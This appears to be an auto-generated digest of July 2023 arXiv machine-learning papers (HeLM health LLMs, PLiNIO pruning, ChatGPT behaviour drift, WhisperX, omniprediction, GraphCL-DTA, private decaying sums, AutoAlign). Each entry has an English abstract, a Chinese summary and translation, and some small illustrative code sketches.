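A compact sketch of the U-shaped idea for 1-D series: merge adjacent patches on the way down, split them back on the way up, and add a Unet-style skip connection so high-frequency detail from the input side survives to the output. Layer sizes and the use of plain linear merge/split projections are illustrative assumptions.

```python
import torch
import torch.nn as nn

class PatchMerge(nn.Module):
    def __init__(self, dim):
        super().__init__()
        self.proj = nn.Linear(2 * dim, dim)
    def forward(self, x):                        # (B, L, D) -> (B, L/2, D)
        B, L, D = x.shape
        return self.proj(x.reshape(B, L // 2, 2 * D))

class PatchSplit(nn.Module):
    def __init__(self, dim):
        super().__init__()
        self.proj = nn.Linear(dim, 2 * dim)
    def forward(self, x):                        # (B, L, D) -> (B, 2L, D)
        B, L, D = x.shape
        return self.proj(x).reshape(B, 2 * L, D)

class TinyUFormer(nn.Module):
    def __init__(self, dim=64, heads=4):
        super().__init__()
        enc_layer = lambda: nn.TransformerEncoderLayer(dim, heads, dim * 2, batch_first=True)
        self.enc1, self.enc2, self.dec1 = enc_layer(), enc_layer(), enc_layer()
        self.down, self.up = PatchMerge(dim), PatchSplit(dim)

    def forward(self, x):                        # x: (B, L, dim), L even
        s1 = self.enc1(x)                        # fine scale keeps high-frequency context
        bottom = self.enc2(self.down(s1))        # coarse scale
        out = self.up(bottom) + s1               # Unet-style skip connection restores detail
        return self.dec1(out)

model = TinyUFormer()
y = model(torch.randn(8, 32, 64))                # (8, 32, 64)
```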

Multimodal LLMs for health grounded in individual-specific data

  • paper_url: http://arxiv.org/abs/2307.09018
  • repo_url: None
  • paper_authors: Anastasiya Belyaeva, Justin Cosentino, Farhad Hormozdiari, Krish Eswaran, Shravya Shetty, Greg Corrado, Andrew Carroll, Cory Y. McLean, Nicholas A. Furlotte
  • for: 这篇研究的目的是为了创建能够处理多种资料模式的大语言模型(LLMs),以解决各种领域中的问题,包括健康领域。
  • methods: 这篇研究使用了一个名为HeLM(Health Large Language Model for Multimodal Understanding)的框架,它可以将高维度的医疗资料与LLMs集成,以估计个人疾病风险。HeLM使用了一个Encoder来转换资料模式,将复杂的资料模式转换为LLM的token embedding空间,并将简单的资料模式转换为文本。
  • results: 基于 UK Biobank 的数据,HeLM 能够有效利用人口统计学特征、临床特征以及高维时间序列数据来估计疾病风险。例如,在结合表格数据与肺量图(spirogram)两种模态时,HeLM 在哮喘预测上取得 0.75 的 AUROC,高于仅使用表格数据时的 0.49。总体而言,在选定的八个二分类性状上,HeLM 均优于或持平于经典机器学习方法。此外,研究还考察了该模型对分布外性状的泛化能力,及其支撑个人健康与保健对话的能力。
    Abstract Foundation large language models (LLMs) have shown an impressive ability to solve tasks across a wide range of fields including health. To effectively solve personalized health tasks, LLMs need the ability to ingest a diversity of data modalities that are relevant to an individual's health status. In this paper, we take a step towards creating multimodal LLMs for health that are grounded in individual-specific data by developing a framework (HeLM: Health Large Language Model for Multimodal Understanding) that enables LLMs to use high-dimensional clinical modalities to estimate underlying disease risk. HeLM encodes complex data modalities by learning an encoder that maps them into the LLM's token embedding space and for simple modalities like tabular data by serializing the data into text. Using data from the UK Biobank, we show that HeLM can effectively use demographic and clinical features in addition to high-dimensional time-series data to estimate disease risk. For example, HeLM achieves an AUROC of 0.75 for asthma prediction when combining tabular and spirogram data modalities compared with 0.49 when only using tabular data. Overall, we find that HeLM outperforms or performs at parity with classical machine learning approaches across a selection of eight binary traits. Furthermore, we investigate the downstream uses of this model such as its generalizability to out-of-distribution traits and its ability to power conversations around individual health and wellness.
    摘要 基础大语言模型(LLM)已经展现出解决包括健康在内的众多领域任务的出色能力。为了有效地解决个性化健康任务,LLM 需要能够摄取与个体健康状况相关的多种数据模态。在本文中,我们朝着构建以个体数据为基础的多模态健康 LLM 迈出了一步,开发了一个框架(HeLM:Health Large Language Model for Multimodal Understanding),使 LLM 能够利用高维临床模态来估计潜在的疾病风险。HeLM 通过学习一个编码器,将复杂的数据模态映射到 LLM 的词元嵌入空间;对于表格等简单模态,则将数据序列化为文本。基于 UK Biobank 的数据,我们表明 HeLM 能够有效地结合人口统计学特征、临床特征以及高维时间序列数据来估计疾病风险。例如,在结合表格与肺量图(spirogram)两种数据模态时,HeLM 在哮喘预测上取得 0.75 的 AUROC,而仅使用表格数据时为 0.49。总体而言,我们发现 HeLM 在选定的八个二分类性状上优于或持平于经典机器学习方法。此外,我们还研究了该模型的下游用途,例如其对分布外性状的泛化能力,以及其支撑围绕个人健康与保健开展对话的能力。
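
A conceptual sketch of the multimodal-grounding idea: a high-dimensional modality (here a 1-D spirogram curve) is encoded and projected into the language model's token-embedding space, then prepended as "soft tokens" to the embedded text prompt. The toy embedding table, sizes, and encoder are assumptions for illustration, not the HeLM implementation.

```python
import torch
import torch.nn as nn

vocab_size, d_model = 1000, 256
token_embedding = nn.Embedding(vocab_size, d_model)      # stand-in for the LLM's embedding table

class SpirogramEncoder(nn.Module):
    """Maps a 1-D spirogram (B, T) to a few soft tokens in the LLM embedding space."""
    def __init__(self, input_len=300, n_soft_tokens=4, d_model=256):
        super().__init__()
        self.n = n_soft_tokens
        self.mlp = nn.Sequential(nn.Linear(input_len, 512), nn.GELU(),
                                 nn.Linear(512, n_soft_tokens * d_model))
    def forward(self, x):
        return self.mlp(x).view(x.size(0), self.n, -1)    # (B, n_soft_tokens, d_model)

encoder = SpirogramEncoder()
spirogram = torch.randn(2, 300)                           # individual-specific signal
text_ids = torch.randint(0, vocab_size, (2, 16))          # serialized tabular data + question

soft_tokens = encoder(spirogram)                          # trainable projection into token space
text_embeds = token_embedding(text_ids)                   # ordinary token embeddings
inputs_embeds = torch.cat([soft_tokens, text_embeds], dim=1)   # what would be fed to the LLM
print(inputs_embeds.shape)                                # torch.Size([2, 20, 256])
```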

PLiNIO: A User-Friendly Library of Gradient-based Methods for Complexity-aware DNN Optimization

  • paper_url: http://arxiv.org/abs/2307.09488
  • repo_url: None
  • paper_authors: Daniele Jahier Pagliari, Matteo Risso, Beatrice Alessandra Motetti, Alessio Burrello
  • for: 这篇论文主要是为了提供一个开源的深度神经网络设计自动化库(PLiNIO),该库以轻量级的基于梯度的优化为基础,集成多种最先进的优化技术,以提高深度神经网络在资源受限的边缘设备上的效能。
  • methods: 这篇论文使用了许多现代的深度神经网络设计自动化技术,包括预测精度估计、优化搜索、阶层优化、卷积优化等,并将这些技术集成到一个开源库中,提供了一个易用的用户界面。
  • results: 根据实验结果,PLiNIO 能够在模型体积与精度之间取得良好的折衷:与基线架构相比,可实现约 94.34% 的内存缩减,而精度损失不到 1%。
    Abstract Accurate yet efficient Deep Neural Networks (DNNs) are in high demand, especially for applications that require their execution on constrained edge devices. Finding such DNNs in a reasonable time for new applications requires automated optimization pipelines since the huge space of hyper-parameter combinations is impossible to explore extensively by hand. In this work, we propose PLiNIO, an open-source library implementing a comprehensive set of state-of-the-art DNN design automation techniques, all based on lightweight gradient-based optimization, under a unified and user-friendly interface. With experiments on several edge-relevant tasks, we show that combining the various optimizations available in PLiNIO leads to rich sets of solutions that Pareto-dominate the considered baselines in terms of accuracy vs model size. Noteworthy, PLiNIO achieves up to 94.34% memory reduction for a <1% accuracy drop compared to a baseline architecture.
    摘要 准确而高效的深度神经网络(DNN)需求量很大,尤其是在需要部署到资源受限的边缘设备上的应用中。由于超参数组合的搜索空间巨大,无法依靠人工进行充分探索,因此为新应用在合理时间内找到这样的 DNN 需要自动化的优化流水线。在本研究中,我们提出了 PLiNIO,一个开源库,它在统一且易用的接口下实现了一整套最先进的 DNN 设计自动化技术,这些技术均基于轻量级的梯度优化。通过在多个与边缘计算相关的任务上进行实验,我们表明组合 PLiNIO 中的各种优化手段可以得到在精度与模型体积上帕累托占优于所考虑基线的丰富解集。值得注意的是,与基线架构相比,PLiNIO 可在精度下降不到 1% 的情况下实现最高 94.34% 的内存缩减。

How is ChatGPT’s behavior changing over time?

  • paper_url: http://arxiv.org/abs/2307.09009
  • repo_url: https://github.com/lchen001/llmdrift
  • paper_authors: Lingjiao Chen, Matei Zaharia, James Zou
  • for: 评估 GPT-3.5 和 GPT-4 两个大语言模型在不同时间点上的变化。
  • methods: 使用多种多样化任务评估 GPT-3.5 和 GPT-4 在不同时间点上的表现。
  • results: 发现 GPT-4 和 GPT-3.5 在不同时间点上的表现和行为可能会有很大的变化,如 prime vs. composite numbers 识别 task 中 GPT-4 (3月2023) 的表现比 GPT-4 (6月2023) 更好,但是 GPT-3.5 在6月的表现更好于3月。
    Abstract GPT-3.5 and GPT-4 are the two most widely used large language model (LLM) services. However, when and how these models are updated over time is opaque. Here, we evaluate the March 2023 and June 2023 versions of GPT-3.5 and GPT-4 on several diverse tasks: 1) math problems, 2) sensitive/dangerous questions, 3) opinion surveys, 4) multi-hop knowledge-intensive questions, 5) generating code, 6) US Medical License tests, and 7) visual reasoning. We find that the performance and behavior of both GPT-3.5 and GPT-4 can vary greatly over time. For example, GPT-4 (March 2023) was reasonable at identifying prime vs. composite numbers (84% accuracy) but GPT-4 (June 2023) was poor on these same questions (51% accuracy). This is partly explained by a drop in GPT-4's amenity to follow chain-of-thought prompting. Interestingly, GPT-3.5 was much better in June than in March in this task. GPT-4 became less willing to answer sensitive questions and opinion survey questions in June than in March. GPT-4 performed better at multi-hop questions in June than in March, while GPT-3.5's performance dropped on this task. Both GPT-4 and GPT-3.5 had more formatting mistakes in code generation in June than in March. Overall, our findings show that the behavior of the "same" LLM service can change substantially in a relatively short amount of time, highlighting the need for continuous monitoring of LLMs.
    摘要 GPT-3.5 和 GPT-4 是目前使用最广泛的两个大语言模型(LLM)服务。然而,这些模型何时以及如何更新并不透明。我们在若干多样化的任务上评估了 2023 年 3 月版和 6 月版的 GPT-3.5 与 GPT-4:1)数学问题;2)敏感/危险问题;3)意见调查;4)多跳知识密集型问题;5)代码生成;6)美国医师执照考试;7)视觉推理。我们发现 GPT-3.5 和 GPT-4 的性能与行为都可能随时间发生很大变化。例如,GPT-4(2023 年 3 月)在判断质数与合数时表现尚可(准确率 84%),但 GPT-4(2023 年 6 月)在同样的问题上表现很差(准确率 51%),这部分归因于 GPT-4 对思维链提示的服从度下降;有趣的是,GPT-3.5 在 6 月份的该任务上反而比 3 月份好得多。与 3 月份相比,6 月份的 GPT-4 更不愿意回答敏感问题和意见调查问题;GPT-4 在多跳问题上的表现 6 月份好于 3 月份,而 GPT-3.5 在该任务上的表现则有所下降;两者在 6 月份的代码生成中都比 3 月份出现了更多的格式错误。总体而言,我们的研究结果表明,“同一个”大语言模型服务的行为可能在相对较短的时间内发生显著变化,这凸显了对 LLM 进行持续监测的必要性。

OxfordVGG Submission to the EGO4D AV Transcription Challenge

  • paper_url: http://arxiv.org/abs/2307.09006
  • repo_url: https://github.com/m-bain/whisperx
  • paper_authors: Jaesung Huh, Max Bain, Andrew Zisserman
  • for: 本研究报告提供了2023年EGO4D音频视觉自动语音识别挑战(AV-ASR)中oxfordvgg团队的技术细节。
  • methods: 本研究使用了 WhisperX 系统对长音频进行高效的语音转写并给出词级时间对齐,同时使用了两个公开可用的文本规范化器。
  • results: 本研究在挑战测试集上取得 56.0% 的词错误率(WER),在排行榜上排名第一。所有基线代码和模型可在 https://github.com/m-bain/whisperX 获取。
    Abstract This report presents the technical details of our submission on the EGO4D Audio-Visual (AV) Automatic Speech Recognition Challenge 2023 from the OxfordVGG team. We present WhisperX, a system for efficient speech transcription of long-form audio with word-level time alignment, along with two text normalisers which are publicly available. Our final submission obtained 56.0% of the Word Error Rate (WER) on the challenge test set, ranked 1st on the leaderboard. All baseline codes and models are available on https://github.com/m-bain/whisperX.
    摘要 这份报告介绍了牛津 VGG 团队在 2023 年 EGO4D 音视频自动语音识别挑战(AV-ASR)中的提交技术细节。我们提出了 WhisperX——一个对长音频进行高效语音转写并给出词级时间对齐的系统,以及两个公开可用的文本规范化器。我们的最终提交在挑战测试集上取得 56.0% 的词错误率(WER),在排行榜上排名第一。所有基线代码和模型可在 https://github.com/m-bain/whisperX 获取。

Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning

  • paper_url: http://arxiv.org/abs/2307.10274
  • repo_url: https://github.com/mtkresearch/clairaudience
  • paper_authors: Feng-Ting Liao, Yung-Chieh Chan, Yi-Chang Chen, Chan-Jan Hsu, Da-shan Shiu
  • for: 本文旨在创建领域敏感的语音识别模型,通过以给定的文本提示为条件进行生成,利用文本形式的领域信息。
  • methods: 本文对预训练的端到端模型(Whisper)进行微调,使其从带有提示示例的演示中学习。
  • results: 本文表明这种能力可以泛化到不同的领域乃至不同的提示上下文:模型在医疗对话、空管通信和金融会议等多个领域的未见数据集上,词错误率(WER)最多降低 33%;此外,通过仅用文本进行微调,同样可以实现领域敏感性与领域自适应。
    Abstract In this work, we propose a method to create domain-sensitive speech recognition models that utilize textual domain information by conditioning its generation on a given text prompt. This is accomplished by fine-tuning a pre-trained, end-to-end model (Whisper) to learn from demonstrations with prompt examples. We show that this ability can be generalized to different domains and even various prompt contexts, with our model gaining a Word Error Rate (WER) reduction of up to 33% on unseen datasets from various domains, such as medical conversation, air traffic control communication, and financial meetings. Considering the limited availability of audio-transcript pair data, we further extend our method to text-only fine-tuning to achieve domain sensitivity as well as domain adaptation. We demonstrate that our text-only fine-tuned model can also attend to various prompt contexts, with the model reaching the most WER reduction of 29% on the medical conversation dataset.
    摘要 在这项工作中,我们提出了一种方法,用于创建领域敏感的语音识别模型:通过以给定的文本提示为条件进行生成,使模型利用文本形式的领域信息。具体做法是对一个预训练的端到端模型(Whisper)进行微调,使其从带有提示示例的演示中学习。我们表明这种能力可以泛化到不同的领域乃至不同的提示上下文:在医疗对话、空管通信和金融会议等多个领域的未见数据集上,我们的模型取得了最多 33% 的词错误率(WER)降幅。考虑到音频-转写成对数据的可获得性有限,我们进一步将该方法扩展为仅用文本进行微调,以同时实现领域敏感性与领域自适应。我们证明,仅用文本微调的模型同样能够关注多种提示上下文,在医疗对话数据集上取得了最高 29% 的 WER 降幅。

Oracle Efficient Online Multicalibration and Omniprediction

  • paper_url: http://arxiv.org/abs/2307.08999
  • repo_url: None
  • paper_authors: Sumegha Garg, Christopher Jung, Omer Reingold, Aaron Roth
  • for: 这种研究的目的是为了研究在在线对抗 Setting中的 omniprediction 算法,以及其与多calibration 的关系。
  • methods: 这种研究使用了多calibration 和 omniprediction 两种概念,以及一些学习理论的概念。
  • results: 这种研究得到了一种新的在线多calibration 算法,可以在无限 benchmark 类 $F$ 中进行定义,并且是 oracle 有效的(即对于任何类 $F$, 算法可以转化为一种有效的减少 regret 学习算法)。此外,这种算法还可以在 linear functions 类 $F$ 中进行有效的实现。此外,这种研究还提供了 upper 和 lower bounds,用于评估这种算法的性能。
    Abstract A recent line of work has shown a surprising connection between multicalibration, a multi-group fairness notion, and omniprediction, a learning paradigm that provides simultaneous loss minimization guarantees for a large family of loss functions. Prior work studies omniprediction in the batch setting. We initiate the study of omniprediction in the online adversarial setting. Although there exist algorithms for obtaining notions of multicalibration in the online adversarial setting, unlike batch algorithms, they work only for small finite classes of benchmark functions $F$, because they require enumerating every function $f \in F$ at every round. In contrast, omniprediction is most interesting for learning theoretic hypothesis classes $F$, which are generally continuously large. We develop a new online multicalibration algorithm that is well defined for infinite benchmark classes $F$, and is oracle efficient (i.e. for any class $F$, the algorithm has the form of an efficient reduction to a no-regret learning algorithm for $F$). The result is the first efficient online omnipredictor -- an oracle efficient prediction algorithm that can be used to simultaneously obtain no regret guarantees to all Lipschitz convex loss functions. For the class $F$ of linear functions, we show how to make our algorithm efficient in the worst case. Also, we show upper and lower bounds on the extent to which our rates can be improved: our oracle efficient algorithm actually promises a stronger guarantee called swap-omniprediction, and we prove a lower bound showing that obtaining $O(\sqrt{T})$ bounds for swap-omniprediction is impossible in the online setting. On the other hand, we give a (non-oracle efficient) algorithm which can obtain the optimal $O(\sqrt{T})$ omniprediction bounds without going through multicalibration, giving an information theoretic separation between these two solution concepts.
    摘要 最近的一系列研究揭示了多重校准(multicalibration,一种多群体公平性概念)与全知预测(omniprediction,一种能同时为一大类损失函数提供损失最小化保证的学习范式)之间的意外联系。先前的工作在批处理设定下研究全知预测,而我们开启了在线对抗设定下的全知预测研究。虽然已有算法可以在在线对抗设定下获得多重校准,但与批处理算法不同,它们只适用于小规模的有限基准函数类 $F$,因为它们需要在每一轮枚举 $F$ 中的每个函数 $f$;而全知预测最有意义的场景是学习理论中的假设类 $F$,这些类通常是连续且无限大的。我们开发了一种新的在线多重校准算法,它对无限的基准类 $F$ 也有良好定义,并且是 oracle 高效的(即对任意类 $F$,该算法都可以高效地归约为 $F$ 上的一个无悔学习算法)。由此我们得到了首个高效的在线全知预测器——一个 oracle 高效的预测算法,可用于同时对所有 Lipschitz 凸损失函数获得无悔保证。对于线性函数类 $F$,我们展示了如何使算法在最坏情况下也保持高效。此外,我们还给出了收敛速率可改进程度的上界与下界:我们的 oracle 高效算法实际上承诺了一种称为 swap-omniprediction 的更强保证,而我们证明了一个下界,表明在在线设定下不可能为 swap-omniprediction 获得 $O(\sqrt{T})$ 的界;另一方面,我们给出了一个(非 oracle 高效的)算法,它无需经由多重校准即可获得最优的 $O(\sqrt{T})$ 全知预测界,从而在信息论层面将这两种解决方案概念区分开来。

GraphCL-DTA: a graph contrastive learning with molecular semantics for drug-target binding affinity prediction

  • paper_url: http://arxiv.org/abs/2307.08989
  • repo_url: None
  • paper_authors: Xinxing Yang, Genke Yang, Jian Chu
  • for: 预测药物与靶点分子之间的结合亲和力,以便在药物发现的早期阶段快速评估新药的潜力。
  • methods: 我们提出了一种融合分子语义的图对比学习框架——GraphCL-DTA,用于学习药物的分子图表示并保留分子图的语义;此外,我们还设计了一种新的损失函数,可直接调整药物和靶点表示的均匀性。
  • results: 我们在两个真实数据集(KIBA 和 Davis)上验证了 GraphCL-DTA 的有效性,结果显示其表现优于此前的最先进模型,具有更高的准确率和更好的可靠性。
    Abstract Drug-target binding affinity prediction plays an important role in the early stages of drug discovery, which can infer the strength of interactions between new drugs and new targets. However, the performance of previous computational models is limited by the following drawbacks. The learning of drug representation relies only on supervised data, without taking into account the information contained in the molecular graph itself. Moreover, most previous studies tended to design complicated representation learning module, while uniformity, which is used to measure representation quality, is ignored. In this study, we propose GraphCL-DTA, a graph contrastive learning with molecular semantics for drug-target binding affinity prediction. In GraphCL-DTA, we design a graph contrastive learning framework for molecular graphs to learn drug representations, so that the semantics of molecular graphs are preserved. Through this graph contrastive framework, a more essential and effective drug representation can be learned without additional supervised data. Next, we design a new loss function that can be directly used to smoothly adjust the uniformity of drug and target representations. By directly optimizing the uniformity of representations, the representation quality of drugs and targets can be improved. The effectiveness of the above innovative elements is verified on two real datasets, KIBA and Davis. The excellent performance of GraphCL-DTA on the above datasets suggests its superiority to the state-of-the-art model.
    摘要 药物-靶点结合亲和力预测在药物发现的早期阶段具有重要作用,可用于推断新药与新靶点之间相互作用的强度。然而,现有计算模型的性能受到以下缺点的限制:药物表示的学习仅依赖于有监督数据,没有考虑分子图本身所包含的信息;此外,多数已有研究倾向于设计复杂的表示学习模块,却忽略了用于衡量表示质量的均匀性。本研究提出了 GraphCL-DTA——一种融合分子语义的图对比学习方法,用于药物-靶点结合亲和力预测。在 GraphCL-DTA 中,我们为分子图设计了图对比学习框架来学习药物表示,从而保留分子图的语义;借助该框架,无需额外的有监督数据即可学到更本质、更有效的药物表示。随后,我们设计了一种新的损失函数,可直接用于平滑地调整药物和靶点表示的均匀性;通过直接优化表示的均匀性,可以提升药物和靶点的表示质量。上述创新点的有效性在 KIBA 和 Davis 两个真实数据集上得到了验证,GraphCL-DTA 在这些数据集上的出色表现表明其优于最先进的模型。
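
A sketch of a uniformity objective on L2-normalized embeddings (in the spirit of Wang & Isola, 2020), which can be added alongside a contrastive or affinity-regression loss to directly regularize how evenly drug and target representations spread on the hypersphere. Whether this matches the paper's exact loss formulation is an assumption.

```python
import torch
import torch.nn.functional as F

def uniformity_loss(z: torch.Tensor, t: float = 2.0) -> torch.Tensor:
    """z: (N, d) embeddings; lower values indicate a more uniform spread on the unit sphere."""
    z = F.normalize(z, dim=-1)
    sq_dists = torch.pdist(z, p=2).pow(2)            # pairwise squared distances
    return torch.log(torch.exp(-t * sq_dists).mean())

drug_z = torch.randn(128, 64, requires_grad=True)
target_z = torch.randn(128, 64, requires_grad=True)
loss = uniformity_loss(drug_z) + uniformity_loss(target_z)
loss.backward()          # combined in practice with the affinity-prediction loss
```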

Neural Network Pruning as Spectrum Preserving Process

  • paper_url: http://arxiv.org/abs/2307.08982
  • repo_url: None
  • paper_authors: Shibo Yao, Dantong Yu, Ioannis Koutis
  • for: 本研究旨在提出一种基于矩阵谱学习视角的神经网络剪枝方法,以提高神经网络在边缘设备上的运行效率。
  • methods: 本文利用矩阵谱学习来分析全连接层和卷积层的训练过程,并据此提出一种面向神经网络剪枝的矩阵稀疏化算法。
  • results: 实验结果表明,该算法能够更好地识别并保留神经网络中的关键权重,从而提高神经网络在边缘设备上的运行效率。
    Abstract Neural networks have achieved remarkable performance in various application domains. Nevertheless, a large number of weights in pre-trained deep neural networks prohibit them from being deployed on smartphones and embedded systems. It is highly desirable to obtain lightweight versions of neural networks for inference in edge devices. Many cost-effective approaches were proposed to prune dense and convolutional layers that are common in deep neural networks and dominant in the parameter space. However, a unified theoretical foundation for the problem mostly is missing. In this paper, we identify the close connection between matrix spectrum learning and neural network training for dense and convolutional layers and argue that weight pruning is essentially a matrix sparsification process to preserve the spectrum. Based on the analysis, we also propose a matrix sparsification algorithm tailored for neural network pruning that yields better pruning result. We carefully design and conduct experiments to support our arguments. Hence we provide a consolidated viewpoint for neural network pruning and enhance the interpretability of deep neural networks by identifying and preserving the critical neural weights.
    摘要 神经网络在各种应用领域都取得了卓越的性能。然而,预训练深度神经网络中庞大的权重数量使其难以部署到智能手机和嵌入式系统上,因此非常需要获得适合在边缘设备上推理的轻量化网络。已有许多低成本方法被提出,用于剪枝深度神经网络中常见且在参数空间中占主导地位的全连接层和卷积层,但该问题大多缺乏统一的理论基础。本文揭示了矩阵谱学习与全连接层、卷积层的神经网络训练之间的紧密联系,并指出权重剪枝本质上是一个保持谱的矩阵稀疏化过程。基于这一分析,我们还提出了一种专为神经网络剪枝设计的矩阵稀疏化算法,能够取得更好的剪枝效果。我们精心设计并开展了实验来支持上述论点。由此,我们为神经网络剪枝提供了一个统一的视角,并通过识别和保留关键的神经权重来增强深度神经网络的可解释性。
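
A small demonstration of viewing pruning as spectrum-preserving sparsification: magnitude-prune a dense weight matrix at increasing sparsity and compare the top singular values of the sparse matrix with those of the original. The random matrix and plain magnitude pruning are illustrative, not the paper's sparsification algorithm.

```python
import numpy as np

rng = np.random.default_rng(0)
W = rng.standard_normal((256, 512)) / np.sqrt(512)
sv_ref = np.linalg.svd(W, compute_uv=False)[:10]          # reference (dense) spectrum

for sparsity in (0.5, 0.8, 0.95):
    thresh = np.quantile(np.abs(W), sparsity)
    W_pruned = np.where(np.abs(W) >= thresh, W, 0.0)      # keep only the largest-magnitude weights
    sv = np.linalg.svd(W_pruned, compute_uv=False)[:10]
    rel_err = np.abs(sv - sv_ref) / sv_ref
    print(f"sparsity {sparsity:.0%}: kept {np.mean(W_pruned != 0):.1%} of weights, "
          f"max top-10 singular-value drift {rel_err.max():.2%}")
```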

A Unifying Framework for Differentially Private Sums under Continual Observation

  • paper_url: http://arxiv.org/abs/2307.08970
  • repo_url: None
  • paper_authors: Monika Henzinger, Jalaj Upadhyay, Sarvagya Upadhyay
  • for: 本研究考虑在持续观察(continual observation)下维护差分隐私的衰减加权和,即随着数据不断到来,持续发布带衰减权重的差分隐私汇总值。
  • methods: 我们为该问题给出了一个统一框架和高效算法,适用于任何足够平滑的权重函数;我们的算法是首个对多项式衰减权重不产生乘性误差的差分隐私算法。
  • results: 我们的算法改进了所有先前关于持续观察下差分隐私衰减和的工作,并且作为推论精确恢复了 Henzinger 等人(SODA 2023)关于持续计数问题的加性误差。该算法是因子化机制的一个变体,其误差取决于底层矩阵的 $\gamma_2$ 与 $\gamma_F$ 范数;我们给出了这两个范数近乎精确的上界的构造性证明,以及对一大类下三角矩阵 $\gamma_2$ 范数近乎紧的下界——这是首个针对非零元素不全相同的下三角矩阵的非平凡下界。
    Abstract We study the problem of maintaining a differentially private decaying sum under continual observation. We give a unifying framework and an efficient algorithm for this problem for \emph{any sufficiently smooth} function. Our algorithm is the first differentially private algorithm that does not have a multiplicative error for polynomially-decaying weights. Our algorithm improves on all prior works on differentially private decaying sums under continual observation and recovers exactly the additive error for the special case of continual counting from Henzinger et al. (SODA 2023) as a corollary. Our algorithm is a variant of the factorization mechanism whose error depends on the $\gamma_2$ and $\gamma_F$ norm of the underlying matrix. We give a constructive proof for an almost exact upper bound on the $\gamma_2$ and $\gamma_F$ norm and an almost tight lower bound on the $\gamma_2$ norm for a large class of lower-triangular matrices. This is the first non-trivial lower bound for lower-triangular matrices whose non-zero entries are not all the same. It includes matrices for all continual decaying sums problems, resulting in an upper bound on the additive error of any differentially private decaying sums algorithm under continual observation. We also explore some implications of our result in discrepancy theory and operator algebra. Given the importance of the $\gamma_2$ norm in computer science and the extensive work in mathematics, we believe our result will have further applications.
    摘要 我们研究在持续观察下维护差分隐私衰减和的问题。我们给出了一个统一框架和高效算法,适用于任何足够平滑的函数。我们的算法是首个对多项式衰减权重不产生乘法误差的差分隐私算法,它改进了此前所有在持续观察下差分隐私衰减和的工作,并在持续计数这一特例中作为推论精确恢复 Henzinger et al.(SODA 2023)的加法误差。该算法是因子化机制的一个变体,其误差取决于底层矩阵的 $\gamma_2$ 与 $\gamma_F$ 范数。我们给出了这两个范数近乎精确上界的构造性证明,以及对一大类下三角矩阵的 $\gamma_2$ 范数近乎紧的下界;这是首个针对非零元素不全相同的下三角矩阵的非平凡下界,它涵盖了所有持续衰减和问题对应的矩阵,从而给出了任何持续观察下差分隐私衰减和算法加法误差的上界。我们还探讨了该结果在差异理论(discrepancy theory)和算子代数中的意义。鉴于 $\gamma_2$ 范数在计算机科学中的重要性以及数学界的大量相关工作,我们相信该结果会有进一步的应用。
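For readers unfamiliar with the factorization mechanism, the sketch below illustrates the generic construction on a toy polynomially-decaying-sum workload: factor the workload matrix as A = L R, add Gaussian noise calibrated to the maximum column norm of R, and read the per-step error off the row norms of L. The square-root factorization and the specific decay weights are our own illustrative choices, not the paper's construction.

```python
import numpy as np
from scipy.linalg import sqrtm

T, eps, delta = 256, 1.0, 1e-6
# Workload: continual decaying sums, A[t, s] = (t - s + 1)^(-1/2) for s <= t.
t_idx, s_idx = np.tril_indices(T)
A = np.zeros((T, T))
A[t_idx, s_idx] = (t_idx - s_idx + 1.0) ** -0.5

def gaussian_sigma(sensitivity, eps, delta):
    # Standard Gaussian-mechanism calibration (sufficient, not tight).
    return sensitivity * np.sqrt(2 * np.log(1.25 / delta)) / eps

def per_step_noise_std(L, R):
    """Noise std per time step of the mechanism x -> L (R x + z), z ~ N(0, sigma^2 I)."""
    sigma = gaussian_sigma(np.linalg.norm(R, axis=0).max(), eps, delta)  # max column norm of R
    return sigma * np.linalg.norm(L, axis=1)                             # row norms of L

# Baseline: output perturbation (L = I, R = A).
naive = per_step_noise_std(np.eye(T), A)
# One simple factorization choice: A = B B with B the principal matrix square root.
B = np.real(sqrtm(A))
factored = per_step_noise_std(B, B)

print("max additive noise std  naive:", naive.max(), " sqrt-factorization:", factored.max())
```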

AutoAlign: Fully Automatic and Effective Knowledge Graph Alignment enabled by Large Language Models

  • paper_url: http://arxiv.org/abs/2307.11772
  • repo_url: None
  • paper_authors: Rui Zhang, Yixin Su, Bayu Distiawan Trisedya, Xiaoyan Zhao, Min Yang, Hong Cheng, Jianzhong Qi
  • for: The paper addresses the task of entity alignment between knowledge graphs (KGs), proposing a fully automatic method that does not require manually crafted seed alignments.
  • methods: The proposed method, AutoAlign, uses predicate embeddings and entity embeddings to align entities between two KGs. Specifically, AutoAlign constructs a predicate-proximity-graph with the help of large language models to automatically capture the similarity between predicates across two KGs, and shifts the two KGs' entity embeddings into the same vector space by computing the similarity between entities based on their attributes.
  • results: The paper reports that AutoAlign improves the performance of entity alignment significantly compared to state-of-the-art methods, as demonstrated through experiments on real-world KGs.
    Abstract The task of entity alignment between knowledge graphs (KGs) aims to identify every pair of entities from two different KGs that represent the same entity. Many machine learning-based methods have been proposed for this task. However, to our best knowledge, existing methods all require manually crafted seed alignments, which are expensive to obtain. In this paper, we propose the first fully automatic alignment method named AutoAlign, which does not require any manually crafted seed alignments. Specifically, for predicate embeddings, AutoAlign constructs a predicate-proximity-graph with the help of large language models to automatically capture the similarity between predicates across two KGs. For entity embeddings, AutoAlign first computes the entity embeddings of each KG independently using TransE, and then shifts the two KGs' entity embeddings into the same vector space by computing the similarity between entities based on their attributes. Thus, both predicate alignment and entity alignment can be done without manually crafted seed alignments. AutoAlign is not only fully automatic, but also highly effective. Experiments using real-world KGs show that AutoAlign improves the performance of entity alignment significantly compared to state-of-the-art methods.
    摘要 知识 graphs (KGs) 的实体对应问题的任务是将两个不同 KGs 中的实体对应到同一个实体。许多机器学习基于方法已经被提出来解决这个问题。然而,我们所知道的是,现有的方法都需要手动制作的种子对应,这是贵重的。在这篇论文中,我们提出了第一个完全自动对应方法,名为 AutoAlign,不需要任何手动制作的种子对应。特别是,对于 predicate 嵌入,AutoAlign 使用大型自然语言模型来自动捕捉两个 KGs 中 predicate 之间的相似性。对于实体嵌入,AutoAlign 先使用 TransE 来独立计算每个 KG 中的实体嵌入,然后通过计算实体之间的属性相似性来将两个 KGs 的实体嵌入Shift到同一个向量空间中。因此, predicate 对应和实体对应都可以不需要手动制作种子对应。AutoAlign 不仅是完全自动的,还非常有效。使用实际世界 KGs 的实验表明,AutoAlign 在对entity alignment进行比对state-of-the-art方法时有显著改进。

Landscape Surrogate: Learning Decision Losses for Mathematical Optimization Under Partial Information

  • paper_url: http://arxiv.org/abs/2307.08964
